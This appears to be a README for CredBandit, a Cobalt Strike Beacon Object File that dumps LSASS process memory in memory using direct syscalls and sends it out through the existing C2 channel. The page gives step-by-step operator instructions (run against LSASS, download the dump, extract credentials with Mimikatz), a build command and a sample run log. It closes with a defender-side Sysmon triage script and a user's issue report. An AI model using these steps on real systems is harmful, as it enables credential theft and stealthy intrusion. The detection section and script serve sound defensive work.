CredBandit - Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel

Overview

CredBandit

CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in-memory dump of a process and send it back through your already existing Beacon communication channel. The dump is produced using NTFS transactions, which lets the tool write it to memory instead of disk, and the MiniDumpWriteDump API has been replaced with an adaptation of ReactOS's implementation of MiniDumpWriteDump.

The memory dump is then downloaded over the beacon with Beacon's native download functionality. The advantage of doing it this way is that the dump is never written to disk and is sent via your already established C2 channel.

Subject References

This tool wouldn't exist without being able to piggyback off some really great research, tools, and code already published by members of the security community. So thank you. Lastly, if you feel anyone has been left out below, please let me know and I will be sure to get them added.

Getting Started

  1. Copy the credBandit folder with all of its contents and place it in a directory just above your cobaltstrike folder on whatever system you use to connect via the GUI application.
  2. Load the MiniDumpWriteDump.cna Aggressor script.
  3. Run credBandit against the target LSASS process (or another process).
  4. Download the dump file from the Aggressor Downloads console.
  5. Use Mimikatz to extract credentials from the dump file.

Build Your Own

Run the command below inside the src directory:

x86_64-w64-mingw32-gcc -o credBanditx64.o -c credBandit.c  -masm=intel

Use Case

With High or SYSTEM integrity, the operator can perform a memory dump of LSASS without ever touching disk.

Syntax

Perform a memory dump and send it back through CS using the BeaconPrintf function. The second parameter, the output name, is optional; it will show up in the Aggressor Downloads console as mem:\[output].dmp

beacon> credBandit 708 output
[*] Running credBandit by (@anthemtotheego)
[+] host called home, sent: 18696 bytes
[+] received output:
[+] Attempting To Enable Debug Privs

[+] received output:
[+] Attempting To Dump Proccess 708

[+] received output:
[+] NtOpenProcess returned HANDLE 0x00000000000006CC

[+] received output:
[+] NtCreateTransaction returned HANDLE 0x00000000000006D4

[+] received output:
[+] RtlSetCurrentTransaction successfully set

[+] received output:
[+] NtCreateFile returned HANDLE 0x00000000000006D8

[+] received output:
[+] RtlSetCurrentTransaction successfully set

[+] received output:
[+] OS Version: 10.0.19042

[+] received output:
[+] MiniDump written to memory

[+] received output:
[+] MiniDump Size In Bytes = 109868198

[+] received output:
[+] NtCreateSection created

[+] received output:
[+] NtMapViewOfSection successful

[*] started download of mem:\output.dmp (109868198 bytes)
[*] download of output.dmp is complete

Caveats

  1. While I have tried to make this pretty stable, and the download method has made it more stable still, BOFs carry the risk of crashing a beacon. Use at your own risk.
  2. Since the BOF executes in-process and takes over the beacon while running, the sleep time is not relevant: data is sent continuously while the dump is exfiltrated.
  3. Lastly, I commented the code in the places where you could make modifications to do other things, for example write to disk instead, or add different encoding/encryption, comms, etc.

Detection

Some detection and mitigation strategies that could be used:

  1. Credential Guard
  2. Event Tracing
  3. Looking for suspicious processes touching LSASS
  4. Looking for other known Cobalt Strike Beacon IOCs or C2 egress/communication IOCs.
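As an added defender-side example (not part of this project's code), the Python script below triages Sysmon ProcessAccess (Event ID 10) records for handles opened on lsass.exe, which is the telemetry behind item 3 above. Sysmon records this event from a kernel object callback, so a handle opened through direct syscalls rather than the ntdll stubs that userland hooks sit on is still logged; what does change is the user-mode CallTrace, whose frames then point into memory not backed by any loaded module and are rendered as UNKNOWN. The sample records, the source image names and the allow-list are constructed assumptions, not real telemetry.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records for suspicious reads of LSASS memory.
Added example for the Detection section; all records below are constructed."""
from dataclasses import dataclass

# Process access rights from winnt.h, in ascending bit order.
ACCESS_NAMES = {
    "PROCESS_CREATE_THREAD": 0x0002,
    "PROCESS_VM_OPERATION": 0x0008,
    "PROCESS_VM_READ": 0x0010,
    "PROCESS_VM_WRITE": 0x0020,
    "PROCESS_DUP_HANDLE": 0x0040,
    "PROCESS_QUERY_INFORMATION": 0x0400,
    "PROCESS_QUERY_LIMITED_INFORMATION": 0x1000,
}
PROCESS_VM_READ = ACCESS_NAMES["PROCESS_VM_READ"]
PROCESS_ALL_ACCESS = 0x1FFFFF

# Assumed allow-list of images that legitimately read LSASS memory; tune per environment.
KNOWN_BENIGN_SOURCES = {r"c:\program files\windows defender\msmpeng.exe"}

# Constructed event message bodies in Sysmon's "Key: value" per-line rendering.
SAMPLE_EVENTS = [
    # Defender reading LSASS: allow-listed source, module-backed call trace -> ignored.
    r"""EventID: 10
UtcTime: 2022-08-08 10:15:00.123
SourceProcessId: 3204
SourceImage: C:\Program Files\Windows Defender\MsMpEng.exe
TargetImage: C:\Windows\System32\lsass.exe
GrantedAccess: 0x1410
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Program Files\Windows Defender\MpClient.dll+1a2b3""",
    # Unknown binary opening LSASS with full access from unbacked code -> flagged, three reasons.
    r"""EventID: 10
UtcTime: 2022-08-08 10:16:42.007
SourceProcessId: 5120
SourceImage: C:\Users\Public\updater.exe
TargetImage: C:\Windows\System32\lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: UNKNOWN(000001F2C3A40512)|UNKNOWN(000001F2C3A40830)""",
    # Full access to a process other than LSASS -> out of scope for this rule.
    r"""EventID: 10
UtcTime: 2022-08-08 10:17:03.550
SourceProcessId: 5120
SourceImage: C:\Users\Public\updater.exe
TargetImage: C:\Windows\System32\svchost.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4a4""",
    # Unlisted tool reading LSASS through the normal ntdll stubs -> flagged, one reason.
    r"""EventID: 10
UtcTime: 2022-08-08 10:20:11.002
SourceProcessId: 6644
SourceImage: C:\Tools\diag.exe
TargetImage: C:\Windows\System32\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Windows\System32\KERNELBASE.dll+2d9ff""",
]


@dataclass
class Finding:
    utc_time: str
    source_image: str
    source_pid: int
    granted_access: int
    reasons: tuple


def parse_sysmon_message(text):
    """Parse a 'Key: value' per-line message body into a dict.
    Splitting on the first colon keeps drive letters and timestamps intact."""
    fields = {}
    for raw in text.strip().splitlines():
        key, sep, value = raw.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def decode_access(mask):
    """Name the rights set in a GrantedAccess mask (only those listed in ACCESS_NAMES)."""
    return [name for name, bit in ACCESS_NAMES.items() if mask & bit]


def assess(fields):
    """Return a Finding when a non-allow-listed process gets read access to lsass.exe, else None."""
    if fields.get("EventID") != "10":
        return None
    if not fields.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    source = fields.get("SourceImage", "")
    if source.lower() in KNOWN_BENIGN_SOURCES:
        return None
    granted = int(fields.get("GrantedAccess", "0x0"), 16)
    reasons = []
    if granted & PROCESS_VM_READ:
        reasons.append("PROCESS_VM_READ granted on lsass.exe")
    if granted == PROCESS_ALL_ACCESS:
        reasons.append("PROCESS_ALL_ACCESS requested")
    if "UNKNOWN" in fields.get("CallTrace", ""):
        reasons.append("call trace contains frames not backed by a loaded module")
    if not reasons:
        return None
    return Finding(fields.get("UtcTime", "?"), source,
                   int(fields.get("SourceProcessId", "0")), granted, tuple(reasons))


def scan(messages):
    """Run assess() over raw message bodies and keep the hits, in input order."""
    return [f for f in (assess(parse_sysmon_message(m)) for m in messages) if f is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        rights = ", ".join(decode_access(hit.granted_access))
        print(f"{hit.utc_time} {hit.source_image} (pid {hit.source_pid}) -> lsass.exe "
              f"access={hex(hit.granted_access)} [{rights}]")
        for reason in hit.reasons:
            print("   -", reason)
```

Run against the constructed records, the second and fourth events are reported and the other two are dropped. The PROCESS_VM_READ bit is the one that matters for any minidump-style read of LSASS; the full-access mask and the unbacked call-trace frames are the extra signals that separate this kind of tooling from an unlisted but ordinary administrative tool, and the same access-mask logic applies to Security event 4656 records where object auditing on lsass.exe is enabled.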

Issues

    NtOpenProcessToken failed

    Hello, I ran beacon as SYSTEM on my Windows 10 VM, and trying to dump lsass, I got the following error:

    [*] Running credBandit by (@anthemtotheego)
    [+] host called home, sent: 17812 bytes
    [+] received output:
    [+] Attempting To Enable Debug Privs

    [-] Failed to open process token

    [-] Failed to adjust process token
    [+] received output:
    [+] Attempting To Dump Proccess 720

    [-] [-] NtOpenProcess failed with status 351000

    Seems that I cannot even NtOpenProcessToken; I tried from a different process, same thing.

    Do you know what the issue is?

    Thanks

    opened by Antho59